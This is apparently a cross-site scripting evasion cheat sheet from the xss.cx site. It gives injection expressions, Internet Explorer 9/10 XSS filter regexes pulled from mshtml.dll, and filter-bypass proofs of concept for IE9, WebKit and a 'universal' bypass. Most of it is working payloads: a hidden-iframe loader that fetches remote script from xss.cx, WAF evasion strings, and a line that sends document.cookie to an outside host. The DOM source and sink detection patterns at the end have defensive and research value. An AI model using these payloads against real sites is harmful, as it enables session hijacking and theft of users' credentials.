MSHTML.DLL, IE XSS Filter, WebKit XSSAdmin Filter, Evasion, Resource, Proof of Concept, Example, DOM, DORK, Cross Site Scripting, Links, Credits Bypass XSS Neutering in User-Agents Cumulative URL for Evasion Techniques This Post to be updated frequently - Last updated 05/21/2013 @1230GMT Abstract: Modern User-Agents are exploited by well-crafted URL's that execute outside the defense coverage envelope of XSS Neutering routines. Definition of XSS {Ferruh Mavintuna}: Cross-site Scripting (CWE-79, CAPEC-86) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. XSS allows for hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser. ============== XSS Expressions ============== Key ============== Operator Injection Reflection ============== Addition & String Concatenation "%2bprompt(9)%2b" ============== Subtraction "-prompt(9)-" ============== Multiplication "*prompt(9)*" ============== Division "/prompt(9)/" ============== Modulus; %25 needs to reflect as %. "%25prompt(9)%25" ============== “Less Than” Comparison "x="" ============== “Greater Than” Comparison ">prompt(9)>" ============== “Less Than or Equal To” Comparison "<=prompt(9)<=" ============== “Greater Than or Equal To” Comparison ">=prompt(9)>=" ============== “Equal To” Comparison "==prompt(9)==" ============== Strong-Typed “Equal To” Comparison "===prompt(9)===" ============== “Not Equal To” Comparison "!=prompt(9)!=" ============== Logical “and”; %26 needs to reflect as &. "%26%26prompt(9)%26%26" ============== Logical “or”; "||prompt(9)||" ============== Bitwise “and”; "%26prompt(9)%26" ============== Bitwise “or” "|prompt(9)|" ============== Bitwise “xor” "^prompt(9)^" ============== Bitwise Left Shift "<x=""< ============== Bitwise Right Shift ">>prompt(9)>>" ============== Bitwise Right Shift With Zeros ">>>prompt(9)>>>" ============== Ternary Conditional Expression "?prompt(9):" ====================================================== Extract XSS Filters from MSHTML.DLL used in IE9 ====================================================== findstr /C:"sc{r}" \WINDOWS\SYSTEM32\mshtml.dll|find "{" ====================================================== Updated: May 21, 2013 - Added IE10 regexp ====================================================== IE9 Summary - 23 Hardcoded Regex in mshtml.dll ====================================================== Fixed strings (2) javascript:, vbscript: HTML tags (14) object, applet, base, link, meta, import, embed, vmlframe, iframe, script(2), style, isindex, form HTML attributes (3) " datasrc, " style=, " on*= (event handlers) JavaScript strings (4) ";location=, ";a.b=, ");a(, ";a(b) ====================================================== IE XSS REGEX RESULTS (As of 09/2011) for IE9 ====================================================== {(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(b|(&[#()\[\].]x?0*((66)|(42)|(98)|(62));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()\[\].]x?0*((82)|(52)|(114)|(72));?))}([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()\[\].]x?0*((73)|(49)|(105)|(69));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()\[\].]x?0*((80)|(50)|(112)|(70));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()\[\].]x?0*((84)|(54)|(116)|(74));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(:|(&[#()\[\].]x?0*((58)|(3A));?)).} {(j|(&[#()\[\].]x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()\[\].]x?0*((82)|(52)|(114)|(72));?))}([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()\[\].]x?0*((73)|(49)|(105)|(69));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()\[\].]x?0*((80)|(50)|(112)|(70));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()\[\].]x?0*((84)|(54)|(116)|(74));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(:|(&[#()\[\].]x?0*((58)|(3A));?)).} {.*?((@[i\\])|(([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))))} {[ /+\t\"\'`]st{y}le[ /+\t]*?=.*?([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))} {]} {} {} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006C))(o|(\\u006F))({c}|(\\u00{6}3))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006F))(n|(\\u006E)))|((n|(\\u006E))(a|(\\u0061))({m}|(\\u00{6}D))(e|(\\u0065)))).*?=} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[\[]}.*?{[\]]}.*?=} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=} {[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}} ====================================================== IE XSS REGEX RESULTS (As of 05/2013) for IE10 ====================================================== {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}} {[\"\'].*?[{,].*(((v|(\\u0076)|(\\166)|(\\x76))[^a-z0-9]*({a}|(\\u00{6}1)|(\\1{4}1)|(\\x{6}1))[^a-z0-9]*(l|(\\u006C)|(\\154)|(\\x6C))[^a-z0-9]*(u|(\\u0075)|(\\165)|(\\x75))[^a-z0-9]*(e|(\\u0065)|(\\145)|(\\x65))[^a-z0-9]*(O|(\\u004F)|(\\117)|(\\x4F))[^a-z0-9]*(f|(\\u0066)|(\\146)|(\\x66)))|((t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*({o}|(\\u00{6}F)|(\\1{5}7)|(\\x{6}F))[^a-z0-9]*(S|(\\u0053)|(\\123)|(\\ {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=} {[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}} {]} {.*?((@[i\\])|(([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))))} {[ /+\t\"\'`]st{y}le[ /+\t]*?=.*?([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))} {(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(b|(&[#()\[\].]x?0*((66)|(42)|(98)|(62));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|( {(j|(&[#()\[\].]x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&(([#()\[\].]x?0*(9|(13) {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006[Cc]))(o|(\\u006[Ff]))({c}|(\\u00{6}3))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006[Ff]))(n|(\\u006[Ee])))|((n|(\\u006[Ee]))(a|(\\u0061))({m}|(\\u00{6}[Dd]))(e|(\\u0065)))|((o|(\\u006[Ff]))(n|(\\u006[Ee]))({e}|(\\u00{6}5))(r|(\\u0072))(r|(\\u0072))(o|(\\u006[Ff]))(r|(\\u0072)))|((v|(\\u0076))(a|(\\u0061))({l}|(\\u00{6}[Cc]))(u|(\\u0075))(e|(\\u0065) {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[\[]}.*?{[\]]}.*?=} {} {<[i]?f{r}ame.*?[ /+\t]*?src[ /+\t]*=} {<.*[:]vmlf{r}ame.*?[ /+\t]*?src[ /+\t]*=} {} {]} {]} {<[i]?f{r}ame.*?[ /+\t]*?src[ /+\t]*=} <=: {} { {} <>:(=&#@ {(j|(&#x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&#x?0*((65)|(41)|(97)|(61));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(v|(&#x?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&#x?0*((65)|(41)|(97)|(61));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&#x?0*((83)|(53)|(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(c|(&#x?0*((67)|(43)|(99)|(63));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(r|(&#x?0*((82)|(52)|(114)|(72));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&#x?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&#x?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(t|(&#x?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(:|(&((#x?0*((58)|(3A));?)|(colon;)))).} :(=# {.*?((@[i\\])|(([:=]|(&#x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&#x?0*((40)|(28)|(92)|(5C));?))))} :& {(v|(&#x?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(b|(&#x?0*((66)|(42)|(98)|(62));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&#x?0*((83)|(53)|(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(c|(&#x?0*((67)|(43)|(99)|(63));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(r|(&#x?0*((82)|(52)|(114)|(72));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&#x?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&#x?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(t|(&#x?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(:|(&((#x?0*((58)|(3A));?)|(colon;)))).} {] ====================================================== XSS URL Overview - IE9 XSS Filter Neutering Example - Craft a URL ====================================================== HTTP GET http://victim.fqdn/?xss= ============================================ IE9 Filters to Neuter = ============================================ [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006C))(o|(\\u006F))(c|(\\u0063))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006F))(n|(\\u006E)))|((n|(\\u006E))(a|(\\u0061))(m|(\\u006D))(e|(\\u0065)))).*?{=} [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?(([.].+?)|([\[].*?[\]].*?)){=} ============================================================= IE9 Filter Bypass PoC #1 ============================================================= Regex = [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(location).*?= Bypass Expression = "+{valueOf:location, toString: [].join,0:'jav\x61script:alert\x280)',length:1}// location("http://xss.cx/"); ============================================================= IE9 Filter Bypass PoC #2 ============================================================= Regex = {[\\\"\\'][ ]*(([^a-z~_:\\'\\\" 0-9])|(in)).+?{\\(}.*?{\\)}} Bypass Expression = foo='&js_xss=";alert(0)// Bypass Expression = ",alert(0)// Bypass Expression = foo= ============================================================= IE9 Filter Bypass PoC #3 ============================================================= Regex = [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?(({[.]}.+?)|({[\[]}.*?{[\]]}.*?))= Bypass Expression = ";x:[document.URL='jav\x61script:alert\x280)']// Bypass Expression = ”>link ============================================================= WebKit XSSAdmin Filter Bypass #1 ============================================================= "> "-prompt(document.location)-" ============================================================= Universal XSS Filter Bypass #1 ============================================================= Expect: Referer: http://www.google.com/search?hl=en&q=xss"> User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)xss"> ============================================================= XSS.CX Low Hanging Fruit Examples, PoC, XSS, Expression, DOM, DORK ============================================================= Array = (function(orig){ var f = function() { alert('DOH'); return orig.apply(this, arguments); } f.prototype = orig.prototype; return f; })(Array); ------------------------------------------------ eval(unescape(location.href)) ------------------------------------------------ onreadystatechange=eval(unescape(location.href)) ------------------------------------------------ ?name=xss# ------------------------------------------------ document.write("XSS"); ------------------------------------------------ #%0Afunction%20DOH%28%29{alert%28%27DOH%27%29%3B} DOH(); ============================================================= Example FrameBuster JS - From bankofamerica.com ============================================================= if (self == top) { var theBody = document.getElementsByTagName('body')[0]; theBody.style.display = "block"; } else { top.location = self.location; } ============================================================= XSS Exploit PoC - iFramer ============================================================= if (document.getElementsByTagName('body')[0]) { iframer(); } else { document.write(""); } function iframer() { var f = document.createElement('iframe'); f.setAttribute('src', 'http://xss.cx/xss.js'); f.style.visibility = 'hidden'; f.style.position = 'absolute'; f.style.left = '0'; f.style.top = '0'; f.setAttribute('width', '10'); f.setAttribute('height', '10'); document.getElementsByTagName('body')[0].appendChild(f); ============================================================= WAF Evasion 101, 102, 103, 104, 105, 106 ============================================================= Don't use alert(1), try: prompt(9) prompt(0x0064) prompt(location.hash) alert(location.hostname) window.location.assign("http://xss.cx") document.location="http://xss.cx/default.aspx?c=" + document.cookie ============================================================= Some Examples (These are from the URL's listed below) ============================================================= http://somesite/test.asp?param=
click to continue
"+eval(name)+" ");eval(name+" ";location=name;// ";a.b=c;// ";a[b]=c;// "+document.cookie+" - Conducting variable assignments to sensitive data, e.g. ";user_input=document.cookie;// or ";user_input=sensitive_app_specific_var;// - Make function assignments, e.g. (Note though that you can't seem to assign to some functions e.g. alert=eval doesn't seem to work) ";escape=eval;// ============================================================= Suggested Reading ============================================================= http://blogs.technet.com/b/srd/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspx http://p42.us/ie8xss/Abusing_IE8s_XSS_Filters.pdf http://www.collinjackson.com/research/xssauditor.pdf https://www.owasp.org/index.php/DOM_Based_XSS https://code.google.com/p/domxsswiki/wiki/Index http://www.webappsec.org/projects/articles/071105.shtml http://code.google.com/p/urlparsing/ http://kotowicz.net/absolute/ ============================================================= DOM-based XSS - Sources and Sinks - (Mario Heiderich) ============================================================= Find Sources: /(location\s*[\[.])|([.\[]\s*["']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database)/ ============================================================= Find Sinks: /((src|href|data|location|code|value|action)\s*["'\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*["'\]]*\s*\()/ ============================================================ Credits ============================================================ Kusa55, #thornmaker, DRoss, Colin Jackson, Stefano Di Paola, Mario Heiderich, Gareth Heyes, Sirdarkcat, Kotowicz, RSnake, Giorgio Maone, sqlhacker, Ferruh Mavituna, Mark Flores Martin, many others... ============================================================= Keywords: XSS, Reflected Cross Site Scripting, DOM-based XSS, CWE-79, CAPEC-86, DORK, GHDB, BHDB, REGEXP, XSSAdmin, XSS Filter, WebKit, Internet Explorer ============================================================= XSS.Cx Resources ============================================================= xss.cx/examples/data/xss-cross-site-scripting-expressions-example-cwe79-capec86-javascript-injection-example-poc-filter-evasion-techniques.txt http://xss.cx/examples/ie/internet-exploror-ie9-xss-filter-rules-example-regexp-mshtmldll.txt alert(location.hash) alert(location.host) alert(location.hostname) alert(location.pathname) alert(location.port) alert(location.protocol) alert(location.search) window.location.assign("http://xss.cx") document.location="http://xss.cx/default.aspx?c=" + document.cookie